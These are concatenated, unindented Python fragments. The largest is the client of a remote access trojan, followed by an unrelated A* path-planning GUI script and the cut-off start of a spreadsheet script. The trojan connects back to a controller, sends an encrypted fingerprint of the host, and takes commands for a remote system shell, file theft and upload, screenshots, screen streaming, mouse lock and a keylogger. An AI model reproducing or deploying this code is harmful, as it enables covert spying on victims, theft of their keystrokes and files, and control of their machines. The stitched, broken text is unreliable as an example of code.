try:
while status_strm:
# print('$starting_streaming')
try:
thread = Thread(target=retreive_screenshot, args=(sock,))
thread.start()
thread.join()
except:
break
except Exception as ee:
#print(7)
# print("ERR: ", e)
sock.close()
# pygame.close()
sock.close()
# pygame.close()
class Client:
def __init__(self):
self.timer_rec = False
while True:
try:
self.s = socket.socket()
self.s.connect((ip, port))
break
except Exception as exception:
#print("Exception: {}".format(type(exception).__name__))
#print("Exception message: {}".format(exception))
#print(8)
time.sleep(15)
self.tag = str(client_tag)
first_connection = True
self.initial_path = pathlib.Path(__file__).parent.absolute()
if first_connection:
os_system = str(platform.system()).lower()
# if os_system == 'windows':
fingerprint = ['system_info',
f'tag:{self.tag}',
f'python_version:{platform.python_version()}',
f'system:{platform.system()}',
f'platform:{platform.platform()}',
f'version:{platform.version()}',
f'processor:{platform.processor().replace(" ", "-").replace(",-", "-")}',
f'architecture:{platform.machine()}',
f'uname:{platform.node()}',
f'mac_version:{self.get_mac()}',
f'external_ip:{self.external_ip_addr()}',
f'local_ip:{self.local_ip()}',
f'status:off',
f'file_path:{os.path.abspath(__file__)}'
]
fingerprint = self.crypt(fingerprint, 'SERVER_KEY')
self.s.send(str(fingerprint).encode('utf-8'))
self.lock_screen_status = False
self.path_output = pathlib.Path(__file__).parent.absolute()
self.break_terminal = False
self.command_terminal = None
self.active_termial = False
self.kl_unique = False
self.stop_logging = False;
# print(f"OS => {platform.platform()}")
f = open('output.txt', 'wb')
if 'windows' in str(platform.platform()).lower():
self.proc = subprocess.Popen('cmd.exe', stderr=subprocess.STDOUT, stdin=subprocess.PIPE, stdout=f)
elif 'linux' in str(platform.platform()).lower() or 'linux' in str(platform.system()).lower():
self.proc = subprocess.Popen('/bin/bash', stderr=subprocess.STDOUT, stdin=subprocess.PIPE, stdout=f)
self.monitoring()
def call_terminal(self, command_server):
rmv_st = command_server
if command_server == '-restore':
try:
with open('output.txt', 'r') as ff:
strc = ff.read()
ff.close()
ansi_escape = re.compile(r'(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]')
output_ansi = ansi_escape.sub('', strc)
strc = output_ansi
with open('output.txt', 'wb') as ff:
ff.write(bytes(strc, encoding='utf-8'))
ff.close()
with open('output.txt', 'rb') as gotp:
content_otp = gotp.read()
try:
content_otp = content_otp.replace(b'\\x00', b'')
content_otp = content_otp.replace(b'\x00', b'')
except:
#print(9)
pass
gotp.close()
time.sleep(2)
# string_output = content_otp.encode('utf-8')
# print(f'-RESTORE {content_otp}')
return content_otp
except:
#print(10)
time.sleep(2)
string_output = 'Has not possible to recovery the last STDOUT\.n'
# string_output = content_otp.encode('utf-8')
return string_output
elif command_server == '-restart':
try:
os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)
return
except:
#print(11)
string_output = '\nWas not possible to restart the .\n.'
string_output = string_output.encode('utf-8')
return string_output
command = str(command_server)
#print(f'[{command}]')
# if command == "cls":
open('output.txt', 'wb').close()
os_sys = str(platform.platform()).lower()
if 'winwdows' in os_sys:
os.system('cls')
if 'linux' in os_sys:
os.system('clear')
time.sleep(0.1)
# else:
command = command.encode('utf-8') + b'\n'
self.proc.stdin.write(command)
self.proc.stdin.flush()
time.sleep(2)
with open('output.txt', 'r') as ff:
strc = ff.read()
ff.close()
ansi_escape = re.compile(r'(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]')
output_ansi = ansi_escape.sub('', strc)
strc = output_ansi
with open('output.txt', 'wb') as ff:
ff.write(bytes(strc, encoding='utf-8'))
ff.close()
with open('output.txt', 'rb') as ff:
string_output = ff.read()
try:
string_output = string_output.replace(b'\\x00', b'')
string_output = string_output.replace(b'\x00', b'')
except:
#print(12)
pass
#print(f'to server -> {string_output}')
# string_output = string_output.encode('utf-8')
# print(string_output)
# try:
# print(string_output)
# except:
# pass
try:
check_stb = string_output[:len(rmv_st)]
if check_stb == bytes(rmv_st, encoding='utf-8'):
rmv_stb = bytes(rmv_st, encoding='utf-8') + b'\n'
#print(rmv_stb)
string_output = string_output.replace(rmv_stb, b'')
except Exception as exception:
print("Exception: {}".format(type(exception).__name__))
print("Exception message: {}".format(exception))
#print(f'final{string_output}')
return string_output
def monitoring(self):
while True:
try:
###########time.sleep(2)
# socket.settimeout(40)
#print('waiting')
self.s.settimeout(60)
string_server = self.s.recv(1024*1024).decode()
#print(f'string server -> {string_server}')
# socket.settimeout(45)
except Exception as exception:
#print("Exception: {}".format(type(exception).__name__))
#print("Exception message: {}".format(exception))
#print(13)
# caso desligue com lock ativo vvvv
self.lock_screen_status = False
##################################
self.s.close()
while True:
############time.sleep(2)
try:
self.s = socket.socket()
self.s.connect((ip, port))
os_system = str(platform.system()).lower()
# if os_system == 'windows':
fingerprint = ['system_info',
f'tag:{self.tag}',
f'python_version:{platform.python_version()}',
f'system:{platform.system()}',
f'platform:{platform.platform()}',
f'version:{platform.version()}',
f'processor:{platform.processor().replace(" ", "-").replace(",-", "-")}',
f'architecture:{platform.machine()}',
f'uname:{platform.node()}',
f'mac_version:{self.get_mac()}',
f'external_ip:{self.external_ip_addr()}',
f'local_ip:{self.local_ip()}',
f'status:off',
]
fingerprint = self.crypt(fingerprint, 'SERVER_KEY')
self.s.send(str(fingerprint).encode('utf-8'))
break
except:
#print(14)
time.sleep(15)
pass
# error aqui
time.sleep(1) ################1335
try:
rcvdData = str(string_server).replace("b'", "").replace("'", "")
except Exception as exception:
#print("Exception: {}".format(type(exception).__name__))
#print("Exception message: {}".format(exception))
#print(15)
continue
try:
rcvdData = bytes(rcvdData, encoding='utf-8')
str_content = self.decrypt(rcvdData, 'SERVER_KEY')
str_content = str(str_content).replace("b'", "").replace("'", "")
except:
#print(16)
continue
# print(f'recbido -> {str_content}')
# if not 'hello' in str(string_server) and str(string_server) != '' and str(string_server) != ' ':
if str_content != 'hello' and str_content != '' and str_content != ' ':
# print(f'S: {str_content}')
# response = self.identify(str(str_content))
response = self.identify(str_content)
# print(f'TO SERVER => -{response}')
try:
response = self.crypt(response, 'SERVER_KEY')
response = response.replace(b'b', b'%%GBITR%%')
# print('----------------')
# print(response)
# print('----------------')
# self.s.send(str(response).encode('utf-8'))
self.s.send(response)
del (string_server)
del (rcvdData)
del (str_content)
del (response)
except:
#print(17)
# 'ALERTA DE EXCEPT')
pass
# time.sleep(1)
def identify(self, command):
if '[SYSTEM_SHELL]' in command:
try:
command = command.replace('[SYSTEM_SHELL]', '')
response = self.call_terminal(command)
return response
except:
#print(18)
pass
elif '[FGET]' in command:
command = command.replace('[FGET]', '')
try:
with open(command, 'rb') as file_content:
f_ct = file_content.read()
file_content.close()
f_ct = self.crypt_file(f_ct, 'SERVER_KEY')
with open(f'{command}_tmp', 'wb') as file_cpt:
file_cpt.write(f_ct)
del (f_ct)
except:
#print(19)
content = 'An error has occurred, please try again.'
return content
try:
f = open(f'{command}_tmp', 'rb')
except:
#print(20)
content = 'An error has occurred, please try again.'
return
l = f.read(1024)
# print('Sending FGET')
time.sleep(2)
while (l):
try:
# l = self.crypt(l, 'SERVER_KEY')
# l = l.replace(b'b', b'%%GBITR%%')
# print(f'> {l}')
self.s.settimeout(5)
self.s.send(l)
except:
#print(21)
# print('except FGET')
break
l = f.read(1024)
f.close()
time.sleep(0.5)
# try:
# self.s.send(b'\\end\\')
# except:
# print('except no \\end\\')
# pass
try:
os.remove(f'{command}_tmp')
except:
#print(22)
content = 'An error has occurred, please try again.'
return content
time.sleep(5)
end_tag = '%&@end__tag@&%'
self.s.send(end_tag.encode('utf-8'))
# print('FIM')
return end_tag
elif '[FPUT]' in command:
# elif command.startwith('[FPUT]'):
command = command.replace('[FPUT]', '')
# continue
try:
for e in range(20):
self.s.settimeout(0.5)
clear_buff = self.s.recv(1024 * 1024 * 1024)
# 'buffer cleaned FGET')
except:
#print(22)
pass
try:
f = open(f'{command}', 'wb')
self.s.settimeout(25)
l = self.s.recv(1024)
# l = str(c.recv(1024))
# l = l.replace('b"', '')
# l = l.replace("b'", '')
# l = l.replace('"', '')
# l = l.replace("'", '')
# l = l.replace('%%GBITR%%', 'b')
# l = bytes(l, encoding='utf-8')
while (l):
# print(f'FRAGMENTO {l}')
# print(f'writing => {l}')
if '%@end_tag@%' in l.decode('utf-8'):
# print('a casa caiu')
break
f.write(l)
l = self.s.recv(1024 * 1024)
# l = str(c.recv(1024))
# l = l.replace('b"', '')
# l = l.replace("b'", '')
# l = l.replace('"', '')
# l = l.replace("'", '')
# l = l.replace('%%GBITR%%', 'b')
# l = bytes(l, encoding='utf-8')
f.close()
# print('FIM ARQUIVO\n\n\n')
with open(f'{command}', 'rb') as a:
b = a.read()
try:
b = self.decrypt(b, 'SERVER_KEY')
with open(f'{command}', 'wb') as c:
c.write(b)
except:
#print(24)
pass
except:
#print(25)
pass
elif '[@%WEBGET%@]' in command:
try:
with open('tmp_call', 'w') as tmpc:
tmpc.write(command)
except:
#print(26)
time.sleep(2)
return
thread_strmg = threading.Thread(target=self.webget_file, args=())
thread_strmg.daemon = True
thread_strmg.start()
time.sleep(2)
return
elif '[@%WEBRAW%@]' in command:
try:
with open('tmp_call', 'w') as tmpc:
tmpc.write(command)
except:
#print(27)
time.sleep(2)
return
thread_strmg = threading.Thread(target=self.webraw_file, args=())
thread_strmg.daemon = True
thread_strmg.start()
time.sleep(2)
return
elif '%get-screenshot%' in command:
# elif command.startwith('%get-screenshot%'):
try:
image = pyautogui.screenshot()
except:
#print(28)
return
image.save(f'screeenshot_{self.tag}.png')
time.sleep(0.2)
with open(f'screeenshot_{self.tag}.png', 'rb') as f:
content_image = f.read()
f.close()
# os.remove(f'screeenshot_{self.tag}.png')
with open(f'screeenshot_crypt_{self.tag}.png', 'wb') as f:
f.write(self.crypt_file(content_image, 'SERVER_KEY'))
f.close()
f = open(f'screeenshot_crypt_{self.tag}.png', 'rb')
# f = open(f'screeenshot_{self.tag}.png', 'rb')
l = f.read(1024)
# print('Sending PNG')
while (l):
# print(">>>", l)
try:
self.s.send(l)
except:
#print(29)
# print("break conexao");
break
l = f.read(1024)
f.close()
time.sleep(2)
try:
self.s.send(b'\\@%end%@\\')
except:
#print(30)
pass
try:
os.remove(f'screeenshot_{self.tag}.png')
os.remove(f'screeenshot_crypt_{self.tag}.png')
except:
#print(31)
pass
return
elif '%lock-screen%' in command:
# elif command.startwith('%lock-screen%'):
threadd = threading.Thread(target=self.lock_screen, args=())
threadd.daemon = True
threadd.start()
time.sleep(2)
return
elif '%unlock-screen%' in command:
# elif command.startwith('%unlock-screen%'):
self.lock_screen_status = False
time.sleep(2)
return
elif '%sv-init-live-video%' in command:
# elif command.startwith('%sv-init-live-video%'):
thread_strmg = threading.Thread(target=self.start_streaming, args=())
thread_strmg.daemon = True
thread_strmg.start()
elif '%start-kl-function%' in command:
# print(self.stop_logging, self.kl_unique)
if self.kl_unique:
return
else:
self.kl_unique = True
thread = threading.Thread(target=self.kl_main, args=())
thread.daemon = True
thread.start()
time.sleep(2)
return
elif '%stop-kl-function%' in command:
self.stop_logging = True
self.kl_unique = False
time.sleep(2)
return
elif '%print-kl-function%' in command:
try:
with open('kl_log.txt', 'r') as get_kll:
log_string = get_kll.read()
get_kll.close()
time.sleep(2)
return f'[@%HOST_SHELL%@]{log_string}'
except:
#print(32)
response = '\nHas not possible to open the keylogger log.\n'
time.sleep(2)
return response
elif '@%list-softwares%@' in command:
if 'windows' in str(platform.platform()).lower():
try:
data = subprocess.check_output(['wmic', 'product', 'get', 'name'])
data_str = str(data)
cont_tmp = []
cont_lst = f'[@%HOST_SHELL%@]'
except:
#print(33)
return
try:
for i in range(len(data_str)):
string_part = (data_str.split("\\r\\r\\n")[6:][i])
string_part = string_part.lstrip().rstrip()
if string_part != '' and string_part != ' ' and string_part != '"' and string_part != "'":
cont_tmp.append(string_part)
except IndexError as e:
#print(34)
pass
try:
for i in cont_tmp:
cont_lst += i + '\n'
except:
#print(35)
pass
return cont_lst
elif 'linux' in str(platform.platform()).lower():
try:
cont_lst = f'[@%HOST_SHELL%@]'
response = subprocess.getoutput('ls /bin && ls /opt')
# response = response.split('\\n')
cont_lst += str(response).replace("[", "");
time.sleep(2)
return cont_lst
except:
#print(36)
pass
else:
response = 'error'
return response
def start_streaming(self):
global status_strm
dir_path = os.path.dirname(os.path.realpath(__file__))
try:
# os.system(f'{dir_path}/vstrm.py')
status_strm = True
main()
except:
#print(37)
pass
def lock_screen(self):
self.lock_screen_status = True
while self.lock_screen_status:
pyautogui.moveTo(1, 1)
def windows_screenshot_stream(self, number):
try:
myScreenshot = pyautogui.screenshot()
myScreenshot.save(f'images/{number}.png')
except:
#print(38)
pass
def webget_file(self):
try:
with open('tmp_call', 'r') as tmpc:
command = tmpc.read()
os.remove('tmp_call')
command = command.replace('[@%WEBGET%@]', '')
command = command.replace('-webget', '').replace(' -f ', ',')
command = command.split(',')
url = command[0]
get_response = requests.get(url, stream=True)
file_name = url.split("/")[-1]
with open(command[1], 'wb') as f:
for chunk in get_response.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.close()
except:
#print(39)
try:
os.remove('tmp_call')
os.remove(command[1])
except:
#print(40)
pass
def webraw_file(self):
try:
with open('tmp_call', 'r') as tmpc:
command = tmpc.read()
os.remove('tmp_call')
command = command.replace('[@%WEBRAW%@]', '')
command = command.replace('-webraw', '').replace(' -f ', ',')
command = command.split(',')
url = command[0]
html = requests.get(url).content
with open(command[1], 'w') as f:
f.write(html.decode('utf-8'))
f.close
except:
#print(41)
try:
os.remove('tmp_call')
os.remove(command[1])
except:
#print(42)
pass
# @staticmethod
def kl_main(self):
while not self.stop_logging:
with Listener(on_press=self.writeLog) as l:
# l.join()
while True:
if self.stop_logging:
l.stop()
self.kl_unique = False
self.stop_logging = False
return
time.sleep(1)
keydata = str(key)
# @staticmethod
def writeLog(self, key):
keydata = str(key)
# print(self.stop_logging)
try:
with open('kl_log.txt', 'r') as create_f:
create_f.close()
except:
#print(43)
with open('kl_log.txt', 'w') as create_f:
create_f.close()
with open("kl_log.txt", "a") as f:
if 'Key.space' in keydata:
f.write(' ')
elif 'Key' in keydata:
return
# f.write(f'<{keydata}>')
else:
f.write(keydata.replace("'", ''))
@staticmethod
def crypt(msg, key):
command = str(msg)
command = bytes(command, encoding='utf8')
cipher_suite = Fernet(key)
encoded_text = cipher_suite.encrypt(command)
return encoded_text
@staticmethod
def crypt_file(msg, key):
cipher_suite = Fernet(key)
encoded_text = cipher_suite.encrypt(msg)
return encoded_text
@staticmethod
def decrypt(msg, key):
cipher_suite = Fernet(key)
decoded_text_f = cipher_suite.decrypt(msg)
return decoded_text_f
@staticmethod
def local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
lip = s.getsockname()[0]
s.close()
return lip
@staticmethod
def external_ip_addr():
try:
exip = requests.get('https://www.myexternalip.com/raw').text
exip = str(exip).replace(' ', '')
except:
#print(44)
exip = 'None'
return exip
@staticmethod
def get_mac():
# mac_num = hex(uuid.getnode()).replace('0x', '').upper()
mac_num = hex(uuid.getnode()).replace('0x', '00').upper()
mac = '-'.join(mac_num[i: i + 2] for i in range(0, 11, 2))
return mac
if __name__ == '__main__':
client = Client()
client.__init__()
"""
|
from .cCollateralBugHandler import cCollateralBugHandler; |
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 20:58:36 2019
@author: Sneha
"""
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 26 13:26:27 2019
@author: Sneha
"""
import tkinter as tk
from tkinter import *
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import numpy as np
import matplotlib.pyplot as plt
import math
from collections import deque, namedtuple
import sys
from collections import defaultdict
from heapq import *
import matplotlib.animation as animation
from shapely.geometry import Point, Polygon
import time
title='Click point in map to select Initial/Final point.'
arr=[]
root= tk.Tk()
class Node:
def __init__(self, node, cost,x,y):
self.node = node
self.parent = None
self.x=x
self.y=y
self.cost = cost
# Print the tree
def PrintTree(self,ax):
if self.parent:
self.parent.PrintTree(ax)
ax.scatter(self.x,self.y,s=10,c='b')
init=[]
final=[]
resolution=1
radius=0
clearance=0
# we'll use infinity as a default distance to nodes.
inf = float('inf')
Edge = namedtuple('Edge', 'start, end, cost')
def onpick(event):
print(event.xdata,event.ydata)
global init,final,title
if(not(init)):
print('init')
init=[int(event.xdata),int(event.ydata)]
else:
print('final')
final=[int(event.xdata),int(event.ydata)]
title='Node Exploration'
return True
def updateMinMax(arr,minx,miny,maxx,maxy,d):
if(maxx>arr[2]):
# print('x max')
arr[2]=maxx+1+d
if(minx<arr[0]):
# print('x min')
arr[0]=minx-1-d
if(maxy>arr[3]):
# print('y max')
arr[3]=maxy+1+d
if(miny<arr[1]):
# print('y min')
arr[1]=miny-1-d
def pathAvailability(x,y,arr,pol,maxPx,minPx,maxPy,minPy):
"""
Box
"""
global radius,clearance,resolution
d=radius+clearance
if(((y-((112.5/resolution)+d))<=0) and ((x-((100/resolution)+d))<=0) and ((-y+((67.5/resolution)-d))<=0) and ((-x+((50/resolution)-d))<=0)):
maxBx=100
minBx=50
maxBy=112.5
minBy=67.5
updateMinMax(arr,minBx,minBy,maxBx,maxBy,d)
return 0
# xpolygon=[120,158, 165,188,168,145];
# % ypolygon=[55,51,89,51,14,14];
# % Line 2 with coordinates (125,56) and (150,15)
p2 = Point(x,y)
for i in pol:
coords = i
poly = Polygon(i)
inside2 = p2.within(poly)
if(inside2==True):
break
if(inside2==True):
updateMinMax(arr,minPx,minPy,maxPx,maxPy,d)
return 0
if((((math.pow((x-(140/resolution)),2)/math.pow(((15/resolution)+d),2))+(math.pow((y-(120/resolution)),2)/math.pow(((6/resolution)+d),2))-1)<=0)):
maxEx=140+15
minEx=140-15
maxEy=120+6
minEy=120-6
updateMinMax(arr,minEx,minEy,maxEx,maxEy,d)
return 0
if((((math.pow((x-(190/resolution)),2))+(math.pow((y-(130/resolution)),2))-(math.pow(((15/resolution)+d),2)))<=0)):
maxCx=190+15
minCx=190-15
maxCy=130+15
minCy=130-15
updateMinMax(arr,minCx,minCy,maxCx,maxCy,d)
return 0
else:
return 1
def make_edge(start, end, cost=1):
return Edge(start, end, cost)
def test(algo_type):
print(algo_type)
def sorting(vals):
print(vals)
return vals
def getKey(item):
return item[0]
def astar(graph,f,t,paths_to_goal,tempx,tempy,weightx,weighty,costw,final,pol):
path=[]
paths_to_goal=[]
count=-1
path=0
queue=[]
queue.append((tempx,tempy))
g = defaultdict(list)
q,seen,mins,queue= [(0,Node(f,0,tempx,tempy))],set(), {f: 0},[(0,f)]
nodes=[]
count=0
nodes.append(Node(f,0,tempx,tempy))
node=''
while (q and node!=t):
(cost1,node)=heappop(queue)
index= [i for ((c,y), i) in zip(q, range(len(q))) if node==y.node]
(cost,v1) = q.pop(index[0])
temp_trav(weightx,weighty,costw,final,graph,g,q,queue,nodes,v1,seen,mins,pol)
ans= [v for v in (nodes) if v.node == t]
print(ans)
if(len(ans)>0):
return nodes,ans[0]
else:
return 'Initial/Final Point in Obstacle!!',0
def animate(listPnts):
global title,root,final,init
fig = plt.Figure(figsize=(5,4), dpi=100)
ax = fig.add_subplot(111)
scatter = FigureCanvasTkAgg(fig, root)
scatter.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)
ax.fill([250,0,0,250],[150,150,0,0], color = (0,0,0))
for i in (listPnts):
ax.fill(i[0],i[1], color = i[2])
ax.legend()
ax.set_title(title);
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
fig.canvas.mpl_connect('button_press_event',onpick)
tk.Label(root, text="Enter Coordinates").pack()
tk.Label(root, text="Initial point(comma separated x,y-no spaces)").pack()
initial=Entry(root)
if(init):
init_str=str(init[0])+' '+str(init[1])
initial.insert(0,init_str)
initial.pack()
tk.Label(root, text="Final point(comma separated x,y-no spaces)").pack()
final1=Entry(root)
if(final):
final_str=str(final[0])+' '+str(final[1])
final1.insert(0,final_str)
final1.pack()
tk.Button(root, text="Quit", command= lambda:quit(initial,final1)).pack()
root.mainloop()
return listPnts
xdata=[]
ydata=[]
def animated(i,nodes,node,test):
global xdata,ydata
t, y = i.x,i.y
xdata.append(t)
ydata.append(y)
xmin, xmax = ax.get_xlim()
if t >= xmax:
ax.set_xlim(xmin, 2*xmax)
ax.figure.canvas.draw()
line.set_data(xdata, ydata)
if(((nodes[len(nodes)-1].x) == i.x) and (nodes[len(nodes)-1].y == i.y)):
node.PrintTree(ax)
return line,
def quit(initial,final1):
global root,init,final,radius,resolution,clearance,arr
resolution=1
if(initial.get()):
if(len((initial.get()).split(','))==2):
x,y=(initial.get()).split(',')
if(x and y and (int(x)) and (int(y))):
init=[int(int(x)/resolution),int(int(y)/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Initial Point.")
label.pack()
test.mainloop()
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid comma separated Initial Point.")
label.pack()
test.mainloop()
elif(init):
init=[int(init[0]/resolution),int(init[1]/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Initial Point.")
label.pack()
test.mainloop()
if(final1.get()):
if(len((final1.get()).split(','))==2):
x1,y1=(final1.get()).split(',')
if(x1 and y1 and (int(x1)) and (int(y1))):
final=[int(int(x1)/resolution),int(int(y1)/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Final Point.")
label.pack()
test.mainloop()
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid comma separated Final Point.")
label.pack()
test.mainloop()
elif(final):
final=[int(final[0]/resolution),int(final[1]/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Final Point.")
label.pack()
test.mainloop()
radius=0
clearance=0
root.quit()
root.destroy()
minx = min(final[0],init[0])-1
miny = min(final[1],init[1])-1
maxx= max(final[0],init[0])+1
maxy= max(final[1],init[1])+1
arr=[minx,miny,maxx,maxy]
def temp_trav(weightx,weighty,cost,final,graph,g,q,queue,nodes,parent,seen,mins,pol):
global arr,maxPx,minPx,maxPy,minPy
flag=0
tempx=parent.x
tempy=parent.y
global radius,clearance,resolution
d=radius+clearance
minx = min(final[0],init[0])-1
miny = min(final[1],init[1])-1
maxx= max(final[0],init[0])+1
maxy= max(final[1],init[1])+1
for i in range(8):
x=tempx+weightx[i]
y=tempy+weighty[i]
costw=cost[i]
a=str(tempx)+' '+str(tempy)
b=str(x)+' '+str(y)
tup=(a,b,costw)
tupin=(b,a,costw)
if((tup not in graph) and (tupin not in graph) and (x>=0 and x<=((250/resolution)+radius) and y>=0 and y<=((150/resolution)+radius)) and (((x+d)<=(250/resolution)) and ((y+d)<=(150/resolution)) and ((x-d)>=(0/resolution)) and ((y-d)>=(0/resolution)))):
if(((pathAvailability(x,y,arr,pol,maxPx,minPx,maxPy,minPy))==1) and (x>=(arr[0]) and y>=(arr[1])) and ( x<=(arr[2]) and y<=(arr[3]) )):
graph.append(tup)
test.append((x,y))
if(b not in seen):
seen.add(b)
dis=np.sqrt(np.square((final[0])-(x)) + np.square((final[1])-(y)))
next = (costw+parent.cost+dis)
v2=(Node(b,(next),x,y))
v2.parent=parent
mins[b] = next
nodes.append(v2)
q.append((next,v2))
heappush(queue, (next, b))
else:
ans= [v for v in (nodes) if v.node == b]
# ans1= [i for i, v in (queue) if v == b]
prev = mins.get(b, None)
dis=np.sqrt(np.square((final[0])-(x)) + np.square((final[1])-(y)))
next = (costw+parent.cost+dis)
if prev is None or next < prev:
ans[0].parent=parent
mins[b] = next
ans[0].cost=next
# ans1[0]=next
else:
minx=arr[0]
miny=arr[1]
maxx=arr[2]
maxy=arr[3]
t = np.linspace(0, 2*np.pi, 100)
r = 15
n=190 #x-position of the center
m=130 #y-position of the center
u=140 #x-position of the center
v=120 #y-position of the center
a=15 #radius on the x-axis
b=6 #radius on the y-axis
p=n+r*np.cos(t)
q=m+r*np.sin(t)
r=u+a*np.cos(t)
s=v+b*np.sin(t)
x = [50, 100, 100, 50]
y = [112.5, 112.5, 67.5, 67.5]
px=[125,163,170,193,173,150]
py=[56,52,90,52,15,15]
fig, ax = plt.subplots()
ax.grid(color=(0,0,0), linestyle='-', linewidth=1)
test=[]
xs=[]
ys=[]
uboxx=[]
uboxy=[]
for i in range(4):
uboxx.append(x[i]+radius*np.cos(t))
uboxy.append(y[i]+radius*np.sin(t) )
upolx=[]
upoly=[]
for i in range(6):
upolx.append(px[i]+radius*np.cos(t))
upoly.append(py[i]+radius*np.sin(t) )
ucirx=[]
uciry=[]
for i in range(len(r)):
ucirx.append(p[i]+radius*np.cos(t))
uciry.append(q[i]+radius*np.sin(t))
uelpx=[]
uelpy=[]
for i in range(len(r)):
uelpx.append(r[i]+radius*np.cos(t))
uelpy.append(s[i]+radius*np.sin(t))
listPnts=animate([[uboxx, uboxy,'b'],[x, y,'r'],[upolx, upoly,'b'], [px, py,'r'],[ucirx, uciry,'b'],[p,q,'r'],[uelpx, uelpy,'b'],[r,s,'r']])
r = 15/resolution
n=190/resolution #x-position of the center
m=130/resolution #y-position of the center
u=140/resolution #x-position of the center
v=120/resolution #y-position of the center
a=15/resolution #radius on the x-axis
b=6/resolution #radius on the y-axis
#plt.gca().set_aspect('equal')
p=n+r*np.cos(t)
q=m+r*np.sin(t)
r=u+a*np.cos(t)
s=v+b*np.sin(t)
x = [50/resolution, 100/resolution, 100/resolution, 50/resolution]
y = [112.5/resolution, 112.5/resolution, 67.5/resolution, 67.5/resolution]
px=[125/resolution,163/resolution,170/resolution,193/resolution,173/resolution,150/resolution]
py=[56/resolution,52/resolution,90/resolution,52/resolution,15/resolution,15/resolution]
uboxx=[]
uboxy=[]
for i in range(4):
uboxx.append(x[i]+radius*np.cos(t))
uboxy.append(y[i]+radius*np.sin(t) )
upolx=[]
upoly=[]
in_x=[]
in_y=[]
for i in range(6):
temp_x=px[i]+radius*np.cos(t)
temp_y=py[i]+radius*np.sin(t)
for j in temp_x:
in_x.append(j)
for k in temp_y:
        in_y.append(k)
upolx.append(temp_x)
upoly.append(temp_y)
ucirx=[]
uciry=[]
for i in range(len(r)):
ucirx.append(p[i]+radius*np.cos(t))
uciry.append(q[i]+radius*np.sin(t))
uelpx=[]
uelpy=[]
for i in range(len(r)):
uelpx.append(r[i]+radius*np.cos(t))
uelpy.append(s[i]+radius*np.sin(t))
ax.fill(uboxx, uboxy,'b')
ax.fill(x, y,'r')
testing=ax.fill(upolx, upoly,'b')
ax.fill(px, py,'r')
ax.fill(ucirx, uciry,'b')
ax.fill(p,q,'r')
ax.fill(uelpx, uelpy,'b')
ax.fill(r,s,'r')
xs=[]
ys=[]
k=0
pol=[]
for i in testing:
array=i.get_xy()
polygon_vertices=[]
for j in array:
polygon_vertices.append((j[0],j[1]))
pol.append(polygon_vertices)
maxPx=0
minPx=250
maxPy=0
minPy=150
for i in pol:
coords = i
poly = Polygon(i)
for j in i:
if(minPx>j[0]):
minPx=j[0]
if(maxPx<j[0]):
maxPx=j[0]
if(minPy>j[1]):
minPy=j[1]
if(maxPy<j[1]):
maxPy=j[1]
print(minPx,minPy,maxPx,maxPy)
obstacles=[[uboxx, uboxy],[upolx, upoly],[ucirx, uciry],[uelpx, uelpy]]
weightx=[0,1,1,1,0,-1,-1,-1]
weighty=[1,1,0,-1,-1,-1,0,1]
cost=[1,np.sqrt(2),1,np.sqrt(2),1,np.sqrt(2),1,np.sqrt(2)]
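# The three lists above define an 8-connected neighbourhood: each index i gives one
# move (weightx[i], weighty[i]) to a neighbouring cell, with cost 1 for the four
# axis-aligned moves and sqrt(2) for the four diagonal moves.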
graph=[]
tempx=init[0]
tempy=init[1]
pathx=[]
pathy=[]
paths_to_goal=[]
plt.tick_params(axis='both', which='major', labelsize=9)
print("Processing.....")
if(init and final):
nodes,node=astar(graph,str(init[0])+' '+str(init[1]),
str(final[0])+' '+str(final[1]),paths_to_goal,tempx,tempy,weightx,weighty,cost,final,pol)
if(node==0):
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= nodes)
label.pack()
test.mainloop()
else:
listPnts=[[uboxx, uboxy,'b'],[x, y,'r'],[upolx, upoly,'b'], [px, py,'r'],[ucirx, uciry,'b'],[p,q,'r'],[uelpx, uelpy,'b'],[r,s,'r']]
test=tk.Tk()
fig = plt.Figure(figsize=(5,4), dpi=100)
ax = fig.add_subplot(111)
line, = ax.plot([], [], 'y.',lw=0.3, alpha=0.2)
ax.grid()
scatter = FigureCanvasTkAgg(fig, test)
scatter.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)
for i in (listPnts):
ax.fill(i[0],i[1], color = i[2])
ax.legend()
ax.grid(color=(0,0,0), linestyle='-', linewidth=1)
ax.set_title(title);
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
ani = animation.FuncAnimation(fig, animated, nodes, fargs=(nodes, node,test), interval=10,repeat=False, blit=False)
test.mainloop()
else:
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please check validity if Initial/Goal Coordinates, Resolution, Radius or Clearance.")
label.pack()
test.mainloop() |
#!/usr/bin/env python3
import pandas as pd
from xlsxwriter.utility import xl_cell_to_rowcol
template_name = 'background/Billing of Witzenmann.xlsx'
source = (
'A7:A15', 'A19:A21', 'A42:A44', 'B2:B11', 'C2:C13', 'D63:D84',
'E2:E168')
def dfg(df, ranges):
for dv_range in ranges:
cells = dv_range.split(':')
rowcol1 = xl_cell_to_rowcol(cells[0])
rowcol2 = xl_cell_to_rowcol(cells[1])
